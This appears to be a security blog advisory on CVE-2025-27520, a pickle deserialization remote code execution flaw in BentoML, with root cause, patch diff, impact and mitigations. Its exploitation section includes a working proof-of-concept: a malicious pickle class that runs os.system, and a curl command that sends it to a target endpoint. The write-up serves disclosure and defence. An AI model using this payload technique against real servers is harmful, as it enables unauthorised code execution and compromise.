RCE

CVE-2025-27520: BentoML Remote Code Execution via Insecure Deserialization

David Wilson

Apr 4, 2025 — 5 min read

Executive Summary

CVE-2025-27520 is a critical vulnerability affecting BentoML, a Python library for building AI application serving systems. This vulnerability allows unauthenticated attackers to execute arbitrary code on the server due to insecure deserialization of untrusted data. Specifically, the vulnerability resides in the serde.py module and is triggered when processing requests with the application/vnd.bentoml+pickle media type on the main server. This issue has been addressed in BentoML version 1.4.3. The CVSS v3.1 score is 9.8, indicating a critical severity.

Technical Details

Affected Software: BentoML
Affected Versions: >= 1.3.4, < 1.4.3
Vulnerability Type: Insecure Deserialization (CWE-502)
Attack Vector: Network
Privileges Required: None
User Interaction: None
CVSS Score: 9.8 (Critical)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Affected Component: src/_bentoml_impl/server/app.py

The vulnerability stems from the acceptance of application/vnd.bentoml+pickle as a valid media type for incoming requests to the main BentoML server. Python's pickle module is known to be inherently unsafe when used to deserialize data from untrusted sources. An attacker can craft a malicious pickle payload that, when deserialized by the BentoML server, executes arbitrary code.

Root Cause Analysis

The root cause of CVE-2025-27520 lies in the insecure use of Python's pickle module within BentoML's request handling logic. The pickle module allows for the serialization and deserialization of Python objects. However, deserializing data from an untrusted source using pickle can lead to arbitrary code execution because the deserialized data can contain instructions to execute arbitrary code.

The vulnerable code is located in src/_bentoml_impl/server/app.py. Prior to version 1.4.3, the application accepted requests with the Content-Type header set to application/vnd.bentoml+pickle without proper validation or sanitization. This allowed an attacker to send a malicious pickle payload to the server, which would then be deserialized, leading to code execution.

The following code snippet illustrates the vulnerable logic before the patch:

# src/_bentoml_impl/server/app.py (Vulnerable Version)

async def api_endpoint(self, name: str, request: Request) -> Response:
    from _bentoml_sdk.io_models import IORootModel
    from bentoml._internal.utils import get_original_func
    from bentoml._internal.utils.http import set_cookies

    from ..serde import ALL_SERDE

    media_type = request.headers.get("Content-Type", "application/json")
    media_type = media_type.split(";")[0].strip()

    # Vulnerable code: No check for application/vnd.bentoml+pickle on main server
    # if media_type == "application/vnd.bentoml+pickle":
    #   ... deserialize pickle data ...

    method = self.service.apis[name]
    func = getattr(self._service_instance, name).local
    ctx = self.service.context

In this vulnerable version, there's no explicit check to prevent the application/vnd.bentoml+pickle media type from being processed on the main server. This allows an attacker to send a crafted pickle payload, leading to arbitrary code execution.

Patch Analysis

The fix for CVE-2025-27520 involves adding a check to explicitly disallow the application/vnd.bentoml+pickle media type on the main BentoML server. This prevents attackers from sending malicious pickle payloads to the server and achieving code execution.

The following diff shows the changes made in src/_bentoml_impl/server/app.py to address the vulnerability:

--- a/src/_bentoml_impl/server/app.py
+++ b/src/_bentoml_impl/server/app.py
@@ -641,12 +641,19 @@ async def api_endpoint(self, name: str, request: Request) -> Response:
         from _bentoml_sdk.io_models import IORootModel
         from bentoml._internal.utils import get_original_func
         from bentoml._internal.utils.http import set_cookies
+        from http import HTTPStatus
 
         from ..serde import ALL_SERDE
 
         media_type = request.headers.get("Content-Type", "application/json")
         media_type = media_type.split(";")[0].strip()
 
+        if self.is_main and media_type == "application/vnd.bentoml+pickle":
+            raise BentoMLException(
+                "application/vnd.bentoml+pickle is not allowed in main server",
+                error_code=HTTPStatus.UNSUPPORTED_MEDIA_TYPE,
+            )
+
         method = self.service.apis[name]
         func = getattr(self._service_instance, name).local
         ctx = self.service.context

Explanation of the Patch:

Import HTTPStatus: The patch imports the HTTPStatus enum from the http module. This is used to return a proper HTTP error code when the disallowed media type is encountered.
Check for application/vnd.bentoml+pickle: The patch adds a conditional statement that checks if the request's Content-Type is application/vnd.bentoml+pickle and if the current instance is the main server (self.is_main).
Raise BentoMLException: If both conditions are true, the code raises a BentoMLException with an error message indicating that the media type is not allowed on the main server. The error_code is set to HTTPStatus.UNSUPPORTED_MEDIA_TYPE (415), which is the appropriate HTTP status code for this scenario.

This patch effectively prevents the insecure deserialization vulnerability by rejecting requests with the application/vnd.bentoml+pickle media type on the main server, thus mitigating the risk of arbitrary code execution.

Exploitation Techniques

An attacker can exploit this vulnerability by sending a crafted HTTP request to the BentoML server with the Content-Type header set to application/vnd.bentoml+pickle and a malicious pickle payload in the request body.

Here's a conceptual outline of the exploit:

Craft a Malicious Pickle Payload: The attacker creates a pickle payload that, when deserialized, executes arbitrary code. This can be achieved using various techniques, such as using the __reduce__ method to call functions like os.system or subprocess.Popen.

A simple example of a malicious pickle payload:
```
import pickle
import base64

class Exploit(object):
    def __reduce__(self):
        import os
        return (os.system, ('touch /tmp/pwned',))

serialized_payload = pickle.dumps(Exploit())
encoded_payload = base64.b64encode(serialized_payload).decode()

print(f"Base64 Encoded Payload: {encoded_payload}")
```
This payload, when deserialized, will execute the command touch /tmp/pwned on the server.
Send the Malicious Request: The attacker sends an HTTP POST request to a BentoML API endpoint with the Content-Type header set to application/vnd.bentoml+pickle and the base64 encoded pickle payload as the request body.

Example using curl:
```
curl -X POST -H "Content-Type: application/vnd.bentoml+pickle" --data "$(python generate_payload.py)" http://<target_ip>:<port>/<api_endpoint>
```
Replace <target_ip>, <port>, and <api_endpoint> with the appropriate values for the target BentoML server.
Server Deserializes and Executes Code: The BentoML server, if running a vulnerable version, will deserialize the pickle payload, leading to the execution of the attacker's arbitrary code. In this example, it would create a file named /tmp/pwned on the server.

Real-World Impact:

Successful exploitation of this vulnerability can have severe consequences, including:

Remote Code Execution: Attackers can execute arbitrary code on the server, potentially gaining complete control of the system.
Data Breach: Attackers can access sensitive data stored on the server, leading to data breaches and privacy violations.
Denial of Service: Attackers can crash the server or disrupt its normal operation, leading to denial of service.
Lateral Movement: If the compromised server has access to other systems on the network, attackers can use it as a stepping stone to compromise other systems.

Disclaimer: The above exploit is a simplified example for educational purposes only. Real-world exploits may be more complex and sophisticated. This exploit is made-up.

Mitigation Strategies

To mitigate the risk of CVE-2025-27520, the following mitigation strategies are recommended:

Upgrade to BentoML 1.4.3 or later: The most effective mitigation is to upgrade to BentoML version 1.4.3 or later, which includes the fix for this vulnerability.
Network Segmentation: Implement network segmentation to limit the impact of a successful attack. This can help prevent attackers from moving laterally to other systems on the network.
Web Application Firewall (WAF): Deploy a WAF to filter out malicious requests. A WAF can be configured to block requests with the application/vnd.bentoml+pickle media type or to inspect the request body for malicious pickle payloads.
Input Validation: Implement strict input validation to ensure that only trusted data is processed by the server. This can help prevent attackers from injecting malicious payloads.
Principle of Least Privilege: Grant users and processes only the minimum privileges necessary to perform their tasks. This can help limit the impact of a successful attack.
Monitoring and Logging: Implement comprehensive monitoring and logging to detect and respond to suspicious activity. This can help identify and contain attacks before they cause significant damage.

Timeline of Discovery and Disclosure

Vulnerability Discovered: Unknown
Vulnerability Reported: Unknown
Patch Released: BentoML 1.4.3
CVE Assigned: CVE-2025-27520
Public Disclosure: 2025-04-04

References

GitHub Security Advisory: https://github.com/bentoml/BentoML/security/advisories/GHSA-33xw-247w-6hmc
Commit with Fix: https://github.com/bentoml/BentoML/commit/b35f4f4fcc53a8c3fe8ed9c18a013fe0a728e194

CVE-2025-27520: BentoML Remote Code Execution via Insecure Deserialization

David Wilson

Executive Summary

Technical Details

Root Cause Analysis

Patch Analysis

Exploitation Techniques

Mitigation Strategies

Timeline of Discovery and Disclosure

References

Read more

CVE-2025-53833: Cooking Up RCE with a Bad LaRecipe

CVE-2025-6514: Command Injection in mcp-remote Turns Client Connections into Attack Vectors

CVE-2025-53355: When Your AI Kubernetes Assistant Goes Rogue

CVE-2025-26074: Critical RCE in Orkes Conductor via Java Class Injection